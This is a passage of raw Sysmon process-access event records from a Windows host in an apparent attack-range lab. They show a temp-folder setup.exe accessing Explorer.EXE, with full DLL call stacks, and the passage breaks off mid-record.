10341000x800000000000000014745Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014744Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014743Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014742Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014741Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014740Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014739Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014738Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014737Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014736Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014735Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014734Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014733Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014732Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014731Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014730Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014729Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014728Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\